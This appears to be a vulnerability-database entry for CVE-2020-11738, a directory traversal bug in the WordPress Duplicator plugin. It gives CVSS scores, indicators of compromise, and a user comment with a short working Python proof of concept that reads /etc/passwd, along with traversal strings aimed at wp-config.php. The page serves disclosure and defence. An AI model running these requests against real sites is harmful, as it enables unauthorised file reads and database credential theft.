Attacker Value

Moderate

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2020-11738

Disclosure Date: April 13, 2020 •

CVE-2020-11738 CVSS v3 Base Score: 7.5

Exploited in the Wild

Reported by gwillcox-r7
View Source Details

Description

The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.

Add Assessment

kevthehermit (138)

April 14, 2020 2:38pm UTC (4 years ago)•

Ratings

Attacker Value

Medium

Exploitability

Very High

Easy to weaponize Gives privileged access Unauthenticated

Technical Analysis

This plugin is recorded as having over 1 Million installations via Wordpress – https://wordpress.org/plugins/duplicator/
It has a free and a pro version with both being impacted.

Other reporting suggests that there are around 170,000 active installations. with ~ 150,000 of these not on the latest version.

The vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack can lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.

This exploit has been seen in active campaigns as reported by wordfence – https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/

IOC’s Shared by wordpress and replicated here for ease of discovery.

Indicators Of Compromise (IOCs)
The following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.

Traffic logged from the threat actor’s IP address should be considered suspicious:

77.71.115.52
- Attacks in this campaign are issued via GET requests with the following query strings:
action=duplicator_download
- file=/../wp-config.php
- Note: Because this vulnerability can be exploited via WP AJAX, it’s possible to exploit via POST request. In this case, it’s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.

See More &1 replySee Less

kevthehermit (138) April 15, 2020 8:13pm UTC (4 years ago)•Edited 4 years ago

I had not seen any POC code listed for this but it is incredibly simple to exploit based on the published details.

In [15]: import requests

In [16]: base_url = "http://172.17.0.2"

In [17]: params = {"action": "duplicator_download", "file": "/../../../../etc/passwd"}

In [18]: requests.get(base_url, params=params).text
Out[18]: 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmysql:x:101:101:MySQL Server,,,:/var/lib/mysql/:/bin/false\n'

In [19]:

File read is still only in the context of the web server so its typically not going to be root.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.5 High

Impact Score:

3.6

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

snapcreek

Products

duplicator

Metasploit Modules

auxiliary/scanner/http/wp_duplicator_file_read (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wp_duplicator_file_read.rb)

Exploited in the Wild

Reported by:

gwillcox-r7 indicated source as Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

Reported: November 03, 2021 3:03pm UTC (3 years ago)

References

Canonical

CVE-2020-11738 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11738)

Miscellaneous

https://snapcreek.com/duplicator/docs/changelog?lite

https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites

https://snapcreek.com/duplicator/docs/changelog/?lite

https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/

http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html

http://packetstormsecurity.com/files/164533/WordPress-Duplicator-1.3.26-Arbitrary-File-Read.html

https://cwe.mitre.org/data/definitions/23.html

Rapid7

Moderate

CVE-2020-11738

Moderate

Very High

None

None

Network

CVE-2020-11738

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

Exploited in the Wild

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Moderate

CVE-2020-11738

Moderate

Very High

None

None

Network

CVE-2020-11738

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

Exploited in the Wild

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification